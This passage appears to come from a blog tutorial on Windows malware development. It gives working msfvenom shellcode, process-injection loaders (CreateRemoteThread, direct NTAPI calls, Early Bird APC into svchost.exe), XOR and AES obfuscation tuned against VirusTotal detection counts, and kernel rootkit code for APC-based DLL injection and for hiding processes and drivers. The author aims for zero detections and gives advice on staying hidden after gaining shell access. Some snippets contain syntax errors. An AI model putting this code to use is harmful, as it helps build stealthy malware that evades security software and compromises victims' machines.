"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
        
    int newPid = atoi(argv[1]);  
    printf("Injecting into pid %d\n", newPid);  
  
    HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);  
    if (!pHandle)  
    {  
        printf("Invalid Handle\n");  
        exit(1);  
    }  
    LPVOID remoteBuf = VirtualAllocEx(pHandle, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
    if (!remoteBuf)  
    {  
        printf("Alloc Fail\n");  
        exit(1);  
    }  
    printf("alloc addr: %p\n", remoteBuf);  
    WriteProcessMemory(pHandle, remoteBuf, shellcode, sizeof(shellcode), NULL);  
    CreateRemoteThread(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuf, NULL, 0, NULL);  
    return 0;  
}

Let’s try to move away from them and directly use the undocumented functions within ntdll.dll in this one we go level lower where we do the syscalls directly.

We need:

Since these APIs are not documented by Microsoft, we need to find some external references made by reverse engineers. http://undocumented.ntinternals.net/

Let’s look at the definition of an NTAPI function from the reference link:

NTSYSAPI   
NTSTATUS  
NTAPI  
  
NtAllocateVirtualMemory(  
  
  
  IN HANDLE               ProcessHandle,  
  IN OUT PVOID            *BaseAddress,  
  IN ULONG                ZeroBits,  
  IN OUT PULONG           RegionSize,  
  IN ULONG                AllocationType,  
  IN ULONG                Protect );

NTSTATUS is the actual return value, while NTSYSAPI marks the function as a library import and NTAPI defines the windows api calling convention.

IN means the function requires it as input, while OUT means that the parameter passed in is modified with some return output, When we prototype the functions, we just need to note the NTAPI part. In fact you can also use WINAPI since the both of them resolve to __stdcall.

typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);  
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);  
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);

Here we prototype some function pointers that we’ll map the address of the actual functions in ntdll.dll to later, You might notice that some types are also missing, for example the POBJECT_ATTRIBUTES, so let’s find and define them from the references.

typedef struct _UNICODE_STRING {  
    USHORT Length;  
    USHORT MaximumLength;  
    PWSTR  Buffer;  
} UNICODE_STRING, *PUNICODE_STRING;  
  
typedef struct _OBJECT_ATTRIBUTES {  
    ULONG           Length;  
    HANDLE          RootDirectory;  
    PUNICODE_STRING ObjectName;  
    ULONG           Attributes;  
    PVOID           SecurityDescriptor;  
    PVOID           SecurityQualityOfService;  
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;  
  
typedef struct _PS_ATTRIBUTE {  
    ULONG Attribute;  
    SIZE_T Size;  
    union {  
        ULONG Value;  
        PVOID ValuePtr;  
    } u1;  
    PSIZE_T ReturnLength;  
} PS_ATTRIBUTE, *PPS_ATTRIBUTE;  
  
typedef struct _PS_ATTRIBUTE_LIST  
{  
    SIZE_T       TotalLength;  
    PS_ATTRIBUTE Attributes[1];  
} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;

These allow us to map the addresses of the actual system calls in ntdll.dll. Now, let’s map them and use them:

HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");  
if (!hNtdll)  
{  
    printf("Load ntdll fail\n");  
    exit(1);  
}  
  
NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");  
NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");  
NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");

Now we can bypass the higher-level APIs and directly call these lower-level functions. We’re still allocating memory, writing to it, and creating a thread, but now we’re doing it at a lower level, which means fewer alarms will be triggered.

typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);  
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);  
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);  
  
int main(int argc, char * argv[])  
{  
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c  
    unsigned char shellcode[] =  
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
     
	int newPid = atoi(argv[1]);  
	printf("Injecting into pid %d\n", newPid);  
  
    HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);  
    if (!pHandle)  
    {  
        printf("Invalid Handle\n");  
        exit(1);  
    }  
    HANDLE tHandle;  
    HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");  
    if (!hNtdll)  
    {  
        printf("Load ntdll fail\n");  
        exit(1);  
    }  
  
    NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");  
    NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");  
    NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");  
    void * allocAddr = NULL;  
    SIZE_T allocSize = sizeof(shellcode);  
    NTSTATUS status;  
    status = NtAllocateVirtualMemory(pHandle, &allocAddr, 0, (PULONG)&allocSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
    printf("status alloc: %X\n", status);  
    printf("alloc addr: %p\n", allocAddr);  
    status = NtWriteVirtualMemory(pHandle, allocAddr, shellcode, sizeof(shellcode), NULL);  
    printf("status write: %X\n", status);  
    status = NtCreateThreadEx(&tHandle, GENERIC_EXECUTE, NULL, pHandle, allocAddr, NULL, 0, 0, 0, 0, NULL);  
    printf("status exec: %X\n", status);  
  
	return 0;  
}

So, if you decide to upload this to VirusTotal (which I don’t recommend, but the choice is yours), what can you expect? You might see 27 out of 72 detections triggering alarms. Why is that? For starters, the raw shellcode and the API usage functions like NtAllocateVirtualMemory, NtWriteVirtualMemory, and NtCreateThreadEx are commonly used in malware and are associated with known patterns. But let’s try something else. !!

As I mentioned, msf shellcode is a giveaway, but let’s try something else. It’s time to dust off some classic techniques that never go out of style. Yes, XOR encryption is a method you’re probably familiar with when it comes to encrypting shellcode. When XOR encryption is applied to shellcode, a key is carefully selected to XOR every byte of the shellcode. To decrypt the shellcode, you simply use the same key to XOR each byte once more.

The XOR operation is reversible, which allows for both the encryption process and the restoration of the original shellcode. However, it’s worth noting that XOR encryption can be quite straightforward for a reverser. If you’re up for a challenge, check out the one I posted a while back: ReverseMeCipher, which involves XOR encryption. As a general rule, it’s often wiser to combine XOR encryption with other methods.

First, we want to remove strings and debug symbols. Running the command strings on our executable reveals strings such as “NtCreateThreadEx.” We can remove these strings by XOR encrypting them and decrypting them during runtime. First, we start with the function responsible for encryption and decryption.

unsigned char * rox(unsigned char *, int, int);
unsigned char * rox(unsigned char * data, int dataLen, int xor_key)
{
    unsigned char * output = (unsigned char *)malloc(sizeof(unsigned char) * dataLen + 1);

    for (int i = 0; i < dataLen; i++)
        output[i] = data[i] ^ xor_key;

    return output;
}

This can be used for encryption and also be used for decryption by applying the same XOR operation. If you XOR the encrypted data with the same xor_key, it will revert to the original data, just formats encrypted shellcode nicely so we can copy and paste, and we only need the encrypt function in our actual injector.

const char* ntdll_str = (const char*)ntdll;
const char* navm_str = (const char*)navm;
const char* nwvm_str = (const char*)nwvm;
const char* ncte_str = (const char*)ncte;

So like we said NtCreateThreadEx. These strings can be indicative and lead to antivirus (AV), One way to obfuscate these strings and make them less detectable is to XOR encrypt them, and then decrypt them during runtime when they are needed,

unsigned char ntdll_data[] = {0x3d, 0x27, 0x37, 0x3f, 0x3f, 0x7d, 0x37, 0x3f, 0x3f, 0x53};
unsigned char *ntdll = rox(ntdll_data, 10, 0x53);

Let’s use Virustotal again and check the detection rate.

While reducing the number of detections from 27 down to 9 is indeed a notable improvement, it’s essential to recognize that this level of evasion is still relatively basic, especially when relying on tools like msfvenom to achieve our goals.

Now, it’s time to explore a new code injection technique called “Early Bird.” This method was used by a group known as APT33. It works by taking advantage of the application threading process that occurs when a program executes on a computer. In other words, attackers inject malware code into legitimate process threads in an effort to hide malicious code within commonly seen and legitimate processes.

We will use functions like ”VirtualAllocEx”, ”WriteProcessMemory”,and ”ResumeThread”. Before injecting the shellcode, and for AES decryption routine. The decryption process utilizes the Cryptography API (CryptAcquireContextW) functions to decrypt the payload using a predefined key.

int AESDecrypt(unsigned char* payload, DWORD payload_len, char* key, size_t keylen) {

HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;

BOOL CryptAcquire = CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
if (CryptAcquire == false) {
//printf("CryptAcquireContextW Failed: %d\n", GetLastError());
return -1;
}

BOOL CryptCreate = CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash);
if (CryptCreate == false) {
//printf("CryptCreateHash Failed: %d\n", GetLastError());
return -1;
}

  
BOOL CryptHash = CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0);
if (CryptHash == false) {
//printf("CryptHashData Failed: %d\n", GetLastError());
return -1;
}

  

BOOL CryptDerive = CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey);
if (CryptDerive == false) {
//printf("CryptDeriveKey Failed: %d\n", GetLastError());
return -1;
}

  

BOOL Crypt_Decrypt = CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, payload, &payload_len);
if (Crypt_Decrypt == false) {
//printf("CryptDecrypt Failed: %d\n", GetLastError());
return -1;
}

  

CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);

return 0;
}

The AES decryption routine ensures that the injected shellcode is in its original, unencrypted form, which is essential for executing it within the target process.

Next CreateProcessW

pfnCreateProcessW pCreateProcessW = (pfnCreateProcessW)GetProcAddress(GetModuleHandleW(L"KERNEL32.DLL"), "CreateProcessW");
if (pCreateProcessW == NULL) {
    // Handle error if the function cannot be found
}

STARTUPINFOW si;
PROCESS_INFORMATION pi;

// Clear out startup and process info structures
RtlSecureZeroMemory(&si, sizeof(si));
si.cb = sizeof(si;
RtlSecureZeroMemory(&pi, sizeof(pi));

std::wstring pName = L"C:\\Windows\\System32\\svchost.exe";

HANDLE pHandle = NULL;
HANDLE hThread = NULL;
DWORD Pid = 0;

BOOL cProcess = pCreateProcessW(NULL, &pName[0], NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

The CreateProcessW function is invoked to create a new process, which, in this case, is intended to execute the svchost.exe application. However, a parameter here is CREATE_SUSPENDED, which is set to TRUE, After successfully creating the suspended process, the code retrieves the process and thread handles. These handles are crucial for further manipulation of the newly created process.

pHandle = pi.hProcess;
hThread = pi.hThread;
Pid = pi.dwProcessId;

With the suspended process and its associated handles in place, now we ready to proceed with the code injection, which involves injecting shellcode into the memory space of the newly created process.

Creating a suspended process to inject code and manipulate the process without raising immediate suspicion, we will proceed to inject the shellcode into the suspended process, ultimately leading to its execution within the context of the target process’s thread, However Before injecting the shellcode memory space is allocated within the target process to accommodate the injected code. This allocation is done using the VirtualAllocEx function.

LPVOID memAlloc = pVirtualAllocEx(pHandle, 0, scSize, MEM_COMMIT, PAGE_EXECUTE_READ);

The shellcode, which was previously decrypted, is now written into the allocated memory space within the target process using the WriteProcessMemory function.

DWORD wMem = pWriteProcessMemory(pHandle, (LPVOID)memAlloc, shellcode, scSize, &bytesWritten);

With the shellcode successfully injected into the target process’s memory, the code prepares for its execution. This is done using the QueueUserAPC function, which enqueues the shellcode for execution within the context of a specific thread within the target process.

if (pQueueUserAPC((PAPCFUNC)memAlloc, hThread, NULL)) {
    pResumeThread(hThread);
}

Now, let’s verify the success of our play by injecting the shellcode into a suspended process and manipulating the memory space within the context of the process’s thread.

Among the initial 72 detections, we’ve narrowed it down to just 5. We started with 27 detections, dropped that to 9, and now we’re sitting at 5. I’m pretty sure we can push it down to zero. This demonstrates the importance of having a diverse range of techniques in your toolkit.

But here’s the thing: while having a low detection rate—whether it’s 5 or even zero—on your payload is great, it doesn’t necessarily mean you’re being truly evasive. What I mean is, it’s not just about the payload. Sure, it plays a significant role, but what you do after gaining access is what really matters.

You can have a payload with zero detections that slips right past common AV or EDR engines. But once you’ve got shell access, you can’t just go dumping Mimikatz all over the place; that’s a quick way to burn your access, as even the most basic AV or EDR will flag that instantly.

So, yes, having a variety of techniques and knowing how to manipulate code is important. But understanding how to navigate through the system without raising red flags? That’s the difference between a skilled operator and an amateur.

Writing a simple Rootkit

Kernel-mode rootkits are the stealthy ninjas of the operating system realm, lurking in the shadows at the most privileged level—Ring 0. Here lies the true power of the system, where rootkits gain direct access to hardware and system resources, executing their nefarious deeds without a trace. Imagine it as possessing the ultimate backstage pass to every intricate detail within a system’s operations.

Conversely, we have user-mode rootkits, hanging out in Ring 3. While they wield less power due to their lower privileges, they still pose a threat. User-mode rootkits can perform certain maneuvers, but they often rely on their kernel-mode counterparts to elevate privileges or maintain a cloak of invisibility.

Kernel-mode rootkits achieve stealth by injecting their own code into system drivers to intercept or modify I/O Request Packets (IRPs). This manipulation can facilitate various malicious actions, such as hiding files and processes or redirecting system calls. Our mission? To dive deep into these techniques and learn to craft our own!

Writing a Windows Device Driver

Let’s kick things off by writtin’ a simple Windows device driver. “Hello World!” to the kernel debugger:

#include "ntddk.h"

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    DbgPrint("Hello World!");
    return STATUS_SUCCESS;
}

While simple, this serves as our foundation. To go into more complex tasks, we need to grasp IRPs structures for communication between user-mode programs and kernel-mode drivers.

When a user-mode application performs operations, like writing to a file handle, the kernel creates an IRP to manage this transaction. To effectively process IRPs, drivers must define handling functions, like ;

NTSTATUS OnStubDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    Irp->IoStatus.Status = STATUS_SUCCESS;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

In a real-world driver, major function pointers, such as IRP_MJ_CREATEIRP_MJ_CLOSE, and IRP_MJ_DEVICE_CONTROL, would handle specific IRP types, enabling complex interactions with the driver.

Creating a File Handle

User-mode programs interact with kernel drivers through file handles. To use a kernel driver, the user-mode app must open a file handle to it. Here’s how we register a device named “MyDevice”:

const WCHAR deviceNameBuffer[] = L"\\Device\\MyDevice";
PDEVICE_OBJECT g_RootkitDevice; // Global pointer to our device object

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    NTSTATUS ntStatus;
    UNICODE_STRING deviceNameUnicodeString;

    RtlInitUnicodeString(&deviceNameUnicodeString, deviceNameBuffer);

    ntStatus = IoCreateDevice(DriverObject, 0, &deviceNameUnicodeString, 0x00001234, 0, TRUE, &g_RootkitDevice);
    // ...
}

A user-mode application can open this device using a fully qualified path like \\Device\\MyDevice. This file handle allows interaction with functions like ReadFile and WriteFile, generating IRPs for communication.

Understanding the interplay between user-mode and kernel-mode via IRPs and file handles is fundamental for crafting effective Windows device drivers, a crucial concept in the world of kernel-mode rootkits.

Remember DLL Injection? Now, let’s take a look at it’s role by rootkits to inject code or custom device drivers directly into the Windows kernel. In the context of the previously discussed device driver and rootkit concepts, we can explore how kernel-mode DLL injection fits into the picture:

Kernel-Mode DLL

The process typically begins with the DriverEntry function, which is the entry point for our driver. Here’s how we start:

NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverobject, IN PUNICODE_STRING pRegister)
{

NTSTATUS st;
  
PsSetLoadImageNotifyRoutine(&LoadImageNotifyRoutine);

pDriverobject->DriverUnload = (PDRIVER_UNLOAD)Unload;
  
return STATUS_SUCCESS;
}

Using PsSetLoadImageNotifyRoutine, we can monitor the loading of critical system DLLs, such as kernel32.dll, into the kernel’s address space.

Plus, we set the driver’s unload function (pDriverobject->DriverUnload) to handle cleanup operations when the driver is unloaded. This ensures that any resources or callbacks registered during the driver’s lifetime are properly managed.

Image Load Notification

Our monitoring hinges on image load notifications. The LoadImageNotifyRoutine function checks if kernel32.dll is being loaded:

VOID LoadImageNotifyRoutine(IN PUNICODE_STRING ImageName, IN HANDLE ProcessId, IN PIMAGE_INFO pImageInfo)
{
    if (ImageName != NULL)
    {
        // Check if the loaded image matches the name of kernel32.dll
        WCHAR kernel32Mask[] = L"*\\KERNEL32.DLL";
        UNICODE_STRING kernel32us;
        RtlInitUnicodeString(&kernel32us, kernel32Mask);

        if (FsRtlIsNameInExpression(&kernel32us, ImageName, TRUE, NULL))
        {
            PKAPC Apc;
            
            if (Hash.Kernel32dll == 0)
            {
                // Initialize the Hash structure and import the function addresses
                Hash.Kernel32dll = (PVOID)pImageInfo->ImageBase;
                Hash.pvLoadLibraryExA = (fnLoadLibraryExA)ResolveDynamicImport(Hash.Kernel32dll, SIRIFEF_LOADLIBRARYEXA_ADDRESS);
            }

            // Create an Asynchronous Procedure Call (APC) to initiate DLL injection
            Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
            if (Apc)
            {
                KeInitializeApc(Apc, KeGetCurrentThread(), 0, (PKKERNEL_ROUTINE)APCInjectorRoutine, 0, 0, KernelMode, 0);
                KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
            }
        }
    }
    return;
}

The LoadImageNotifyRoutine function plays a pivotal role in our DLL injection process. It checks if the ImageName parameter is not NULL, ensuring that we are actively monitoring loaded images with names. Furthermore, we examine if the loaded image matches the name of kernel32.dll.

If a match is found, we proceed with initializing the Hash structure and creating an Asynchronous Procedure Call (APC) using the APCInjectorRoutine. The APC serves as a mechanism to trigger the DLL injection process into a target process.

These code snippets are instrumental in monitoring and responding to the loading of kernel32.dll and lay the groundwork for our upcoming discussion on kernel-mode DLL injection.

Unloading the Driver

Before we go deeper into DLL injection, we got understand how the driver can be unloaded properly. We accomplish this using the Unload function.

VOID Unload(IN PDRIVER_OBJECT pDriverobject)
{
    // Remove the image load notification routine
    PsRemoveLoadImageNotifyRoutine(&LoadImageNotifyRoutine);
}

Here, we use the PsRemoveLoadImageNotifyRoutine function to unregister the previously registered image load notification routine.

DLL Injection

Our exploration of kernel-mode DLL injection is incomplete without understanding how the actual injection takes place. The DllInject function is the key to achieving this.

NTSTATUS DllInject(HANDLE ProcessId, PEPROCESS Peprocess, PETHREAD Pethread, BOOLEAN Alert)
{
    HANDLE hProcess;
    OBJECT_ATTRIBUTES oa = { sizeof(OBJECT_ATTRIBUTES) };
    CLIENT_ID cidprocess = { 0 };
    CHAR DllFormatPath[] = "C:\\foo.dll";
    ULONG Size = strlen(DllFormatPath) + 1;
    PVOID pvMemory = NULL;

    cidprocess.UniqueProcess = ProcessId;
    cidprocess.UniqueThread = 0;

    // Open the target process
    if (NT_SUCCESS(ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, &cidprocess)))
    {
        // Allocate virtual memory in the target process
        if (NT_SUCCESS(ZwAllocateVirtualMemory(hProcess, &pvMemory, 0, &Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)))
        {
            KAPC_STATE KasState;
            PKAPC Apc;

            // Attach to the target process
            KeStackAttachProcess(Peprocess, &KasState);

            // Copy the DLL path to the target process's memory
            strcpy(pvMemory, DllFormatPath);

            // Detach from the target process
            KeUnstackDetachProcess(&KasState);

            // Allocate memory for the APC
            Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
            if (Apc)
            {
                // Initialize the APC with the appropriate routine and parameters
                KeInitializeApc(Apc, Pethread, 0, (PKKERNEL_ROUTINE)APCKernelRoutine, 0, (PKNORMAL_ROUTINE)Hash.pvLoadLibraryExA, UserMode, pvMemory);

                // Insert the APC into the thread's queue
                KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
                return STATUS_SUCCESS;
            }
        }
        // Close the target process handle
        ZwClose(hProcess);
    }

    return STATUS_NO_MEMORY;
}

The DllInject function serves the critical role of injecting a DLL into a target process in kernel mode. It accepts several parameters, including the ProcessId of the target process, the PEPROCESS structure of the target process (Peprocess), the PETHREAD structure of the target process (Pethread), and a Boolean value indicating whether alertable I/O is allowed (Alert).

The injection process begins with the opening of the target process using ZwOpenProcess. This step grants us access to the target process with full privileges.

Subsequently, we allocate virtual memory within the target process using ZwAllocateVirtualMemory. This allocated memory will be used to store the path to the DLL that we intend to inject.

To safely write data into the target process’s memory, we attach to the target process using KeStackAttachProcess. This attachment is crucial for the integrity and safety of the DLL injection process.

With the attachment in place, we copy the path of the DLL to be injected into the allocated virtual memory within the target process. This path is defined in the DllFormatPath variable.

After successfully copying the DLL path, we detach from the target process using KeUnstackDetachProcess.

The heart of the DLL injection lies in the creation of an Asynchronous Procedure Call (APC). This is accomplished by allocating memory for the APC using ExAllocatePool. The APC is initialized with the necessary routine and parameters.

To ensure that DLL injection occurs in a controlled and synchronized manner, we rely on the SirifefWorkerRoutine and APCInjectorRoutine functions.

VOID SirifefWorkerRoutine(PVOID Context)
{
    DllInject(((PSIRIFEF_INJECTION_DATA)Context)->ProcessId, ((PSIRIFEF_INJECTION_DATA)Context)->Process, ((PSIRIFEF_INJECTION_DATA)Context)->Ethread, FALSE);
    KeSetEvent(&((PSIRIFEF_INJECTION_DATA)Context)->Event, (KPRIORITY)0, FALSE);
    return;
}

The SirifefWorkerRoutine function acts as a worker routine responsible for triggering the DLL injection. It accepts a single Context parameter.

Once the DLL injection process completes, an event (KeSetEvent) is set to signal the successful injection. This event allows us to synchronize the completion of the injection process with other parts of the code.

DLL Injection via APC

The initiation of DLL injection takes place within the APCInjectorRoutine function, The APCInjectorRoutine function serves as the orchestrator for our DLL injection process. It commences by initializing a SIRIFEF_INJECTION_DATA structure, Sf, and scheduling a worker thread (SirifefWorkerRoutine) to perform the injection.

VOID NTAPI APCInjectorRoutine(PKAPC Apc, PKNORMAL_ROUTINE *NormalRoutine, PVOID *SystemArgument1, PVOID *SystemArgument2, PVOID* Context)
{
    SIRIFEF_INJECTION_DATA Sf;

    RtlSecureZeroMemory(&Sf, sizeof(SIRIFEF_INJECTION_DATA));
    ExFreePool(Apc);

    // Initialize the SIRIFEF_INJECTION_DATA structure with the necessary information
    Sf.Ethread = KeGetCurrentThread();
    Sf.Process = IoGetCurrentProcess();
    Sf.ProcessId = PsGetCurrentProcessId();

    // Initialize an event to synchronize the DLL injection
    KeInitializeEvent(&Sf.Event, NotificationEvent, FALSE);

    // Initialize a work item to execute the SirifefWorkerRoutine
    ExInitializeWorkItem(&Sf.WorkItem, (PWORKER_THREAD_ROUTINE)SirifefWorkerRoutine, &Sf);

    // Queue the work item to be executed on the DelayedWorkQueue
    ExQueueWorkItem(&Sf.WorkItem, DelayedWorkQueue);

    // Wait for the DLL injection to complete
    KeWaitForSingleObject(&Sf.Event, Executive, KernelMode, TRUE, 0);

    return;
}

These routines work together to schedule and execute the DLL injection into the target process after the kernel32.dll module is loaded. This injection is performed in a controlled and synchronized manner, ensuring that the target process is injected with the specified.

Hide Process

A interesting technique we can use in our rootkit is to hide or unlink a target process, which will be hidden from AVs, We won’t be able to see this in the Windows Task Manager.

To hide our process we need to understand a few Windows internal concepts, such as the EPROCESS data structure in the Windows kernel. EPROCESS is an opaque data structure in the Windows kernel that contains important information about processes running on the system. The offsets of this large structure change from build to build or version to version.

What we’re interested in is, ActiveProcessLinks, which is a pointer to a structure called LIST_ENTRY. We can’t just access this data structure normally like EPROCESS.ActiveProcessLinks, we have to use PsGetCurrentProcess to get the current EPROCESS and then add an offset that is version dependent. This is the downside to the EPROCESS structure. It can make it very hard to have a compatible Windows Kernel rootkit.

kd> dt nt!_EPROCESS
<..redacted...>
    +0x000 Pcb              : _KPROCESS
    +0x3e8 ProcessLock      : _EX_PUSH_LOCK
    +0x2f0 UniqueProcessId  : Ptr64 Void
    +0x400 ActiveProcessLinks : _LIST_ENTRY

The LIST_ENTRY data structure is a doubly-linked list, where FLINK (forward link) and BLINK are references to the next and previous elements in the doubly-linked list.

Using the information above, we can hide our process from being shown by manipulating the kernel data structures. To hide our process we can do the following:

This manipulation unlinks the data structure of our target process, EPROCESS 2, from the doubly-linked list, rendering it invisible to system inspectors.

// Function to hide a process by manipulating kernel data structures
NTSTATUS HideProcess(ULONG pid) {
    PEPROCESS currentEProcess = PsGetCurrentProcess();
    LIST_ENTRY* currentList = &currentEProcess->ActiveProcessLinks;
    
    // Get the offsets for UniqueProcessId and ActiveProcessLinks
    ULONG uniqueProcessIdOffset = FIELD_OFFSET(EPROCESS, UniqueProcessId);
    ULONG activeProcessLinksOffset = FIELD_OFFSET(EPROCESS, ActiveProcessLinks);
    
    ULONG currentPid;
    {
        // Check if the current process ID is the one to hide
        RtlCopyMemory(&currentPid, (PUCHAR)currentEProcess + uniqueProcessIdOffset, sizeof(currentPid));
        if (currentPid == pid) {
            // Remove the process from the list
            LIST_ENTRY* blink = currentList->Blink;
            LIST_ENTRY* flink = currentList->Flink;
            blink->Flink = flink;
            flink->Blink = blink;
            return STATUS_SUCCESS;
        }
        
        // Move to the next process
        currentList = currentList->Flink;
        currentEProcess = CONTAINING_RECORD(currentList, EPROCESS, ActiveProcessLinks);
    } while (currentList != &currentEProcess->ActiveProcessLinks);
    
    return STATUS_NOT_FOUND;  // Process not found
}

HideProcess, which hides a process using the DKOM technique. It takes the Process ID (PID) of the target process as an argument. Here’s how it works:

  1. It starts by obtaining the current EPROCESS structure for the executing driver using PsGetCurrentProcess.
  2. The code then retrieves the offsets within the EPROCESS structure for UniqueProcessId and ActiveProcessLinks.
  3. It iterates through the list of active processes, comparing the PID of each process with the target PID. When it finds a match, it unlinks the process from the ActiveProcessLinks list, effectively hiding it.
  4. The function returns STATUS_SUCCESS if it successfully hides the process. If the target process is not found, it returns STATUS_NOT_FOUND.

Hiding a Driver

In addition to hiding processes, we can also employ the DKOM technique to hide drivers from the system. This is particularly useful in scenarios where a rootkit needs to remain undetected

// Function to hide a driver by manipulating data structures
NTSTATUS HideDriver(PDRIVER_OBJECT driverObject) {
    KIRQL irql;
    
    // Raise IRQL to DPC level
    irql = KeRaiseIrqlToDpcLevel();
    
    // Get the module entry from the DriverObject
    PLDR_DATA_TABLE_ENTRY moduleEntry = (PLDR_DATA_TABLE_ENTRY)driverObject->DriverSection;
    
    // Unlink the module entry
    moduleEntry->InLoadOrderLinks.Blink->Flink = moduleEntry->InLoadOrderLinks.Flink;
    moduleEntry->InLoadOrderLinks.Flink->Blink = moduleEntry->InLoadOrderLinks.Blink;
    
    // Lower IRQL back to its original value
    KeLowerIrql(irql);
    
    return STATUS_SUCCESS;
}

HideDriver function is designed to hide a driver by manipulating kernel data structures. Here’s a breakdown of how it works:

  1. It raises the IRQL (Interrupt Request Level) to DPC (Deferred Procedure Call) level using KeRaiseIrqlToDpcLevel. This is essential to ensure that the manipulation of kernel data structures is performed atomically and doesn’t interfere with ongoing system operations.
  2. Next, it obtains the module entry by casting the DriverSection member of the provided driverObject to a PLDR_DATA_TABLE_ENTRY. This provides access to information about the driver module.
  3. It unlinks the module entry from the kernel’s internal linked lists. By manipulating the InLoadOrderLinks member of the module entry, it effectively removes the driver from the list of loaded modules.
  4. Finally, it lowers the IRQL back to its original value using KeLowerIrql, allowing normal system operation to resume.

